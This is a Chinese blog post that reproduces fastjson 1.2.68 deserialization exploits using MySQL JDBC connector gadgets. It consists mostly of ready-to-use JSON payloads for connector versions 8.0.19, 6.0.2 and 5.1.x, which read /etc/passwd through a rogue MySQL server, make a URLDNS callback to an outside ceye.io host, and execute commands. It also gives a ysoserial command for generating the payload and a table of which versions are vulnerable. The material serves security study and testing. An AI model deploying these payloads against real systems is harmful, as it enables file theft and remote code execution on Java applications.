fastjson 高版本jdbc利用

前言

整理復(fù)現(xiàn)一下互聯(lián)網(wǎng)fastjson 高版本jdbc利用。

fastjson 1.2.68 版本與jdbc

mysql-connector-java = 8.0.19時(shí)
可讀取文件

{
    "@type": "java.lang.AutoCloseable",
    "@type": "com.mysql.cj.jdbc.ha.ReplicationMySQLConnection",
    "proxy": {
        "@type": "com.mysql.cj.jdbc.ha.LoadBalancedConnectionProxy",
        "connectionUrl": {
            "@type": "com.mysql.cj.conf.url.ReplicationConnectionUrl",
            "masters": [
                {
                    "host": "10.211.55.2"
                }
            ],
            "slaves": [],
            "properties": {
                "host": "10.211.55.2",
                "user": "fileread_/etc/passwd",
                "dbname": "dbname",
                "password": "pass",
                "queryInterceptors": "com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor",
                "autoDeserialize": "true",
                "allowLoadLocalInfile": "true"
            }
        }
    }
}

可URLDNS

{
    "@type": "java.lang.AutoCloseable",
    "@type": "com.mysql.cj.jdbc.ha.ReplicationMySQLConnection",
    "proxy": {
        "@type": "com.mysql.cj.jdbc.ha.LoadBalancedConnectionProxy",
        "connectionUrl": {
            "@type": "com.mysql.cj.conf.url.ReplicationConnectionUrl",
            "masters": [
                {
                    "host": "10.211.55.2"
                }
            ],
            "slaves": [],
            "properties": {
                "host": "10.211.55.2",
                "user": "deser_URLDNS_http://xxs.decftp.ceye.io",
                "dbname": "dbname",
                "password": "pass",
                "queryInterceptors": "com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor",
                "autoDeserialize": "true",
                "allowLoadLocalInfile": "true"
            }
        }
    }
}

可命令執(zhí)行

image.png
image.png
{
    "@type": "java.lang.AutoCloseable",
    "@type": "com.mysql.cj.jdbc.ha.ReplicationMySQLConnection",
    "proxy": {
        "@type": "com.mysql.cj.jdbc.ha.LoadBalancedConnectionProxy",
        "connectionUrl": {
            "@type": "com.mysql.cj.conf.url.ReplicationConnectionUrl",
            "masters": [
                {
                    "host": "10.211.55.2"
                }
            ],
            "slaves": [],
            "properties": {
                "host": "10.211.55.2",
                "user": "test",
                "dbname": "dbname",
                "password": "pass",
                "queryInterceptors": "com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor",
                "autoDeserialize": "true",
                "allowLoadLocalInfile": "true"
            }
        }
    }
}

mysql-connector-java = 6.0.2時(shí),poc為

{
    "@type": "java.lang.AutoCloseable",
    "@type": "com.mysql.cj.jdbc.ha.LoadBalancedMySQLConnection",
    "proxy": {
        "connectionString": {
            "url": "jdbc:mysql://10.211.55.2:3306/test?allowLoadLocalInfile=true&autoDeserialize=true&statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=fileread_/etc/passwd"
        }
    }
}

使用

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar Fastjson1  "open -a Calculator"  > payload

生成payload

image.png

而后使用 fake-mysql-gui-0.0.4.jar 啟動(dòng)端口??擅顖?zhí)行。

image.png

5.1.11 > mysql-connector-java > 5.1.48 時(shí),poc為

{
    "@type": "java.lang.AutoCloseable",
    "@type": "com.mysql.jdbc.JDBC4Connection",
    "hostToConnectTo": "127.0.0.1",
    "portToConnectTo": 3306,
    "info": {
        "user": "fileread_/etc/passwd",
        "password": "3306",
        "maxAllowedPacket": "655360",
        "statementInterceptors": "com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor",
        "autoDeserialize": "true",
        "NUM_HOSTS": "1"
    },
    "databaseToConnectTo": "dbname",
    "url": ""
}

總結(jié)

1.2.36 版本 > fastjson > 1.2.68 版本 讀取文件 URLDNS 命令執(zhí)行
mysql-connector-java > 8.0.19 ? x x
mysql-connector-java = 8.0.19 ? ? ?
mysql-connector-java < 8.0.19 x x x
mysql-connector-java = 6.0.2 ? ? ?
mysql-connector-java = 6.0.3 ? ? ?
5.1.10 < mysql-connector-java <= 5.1.48 ? ? ?
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容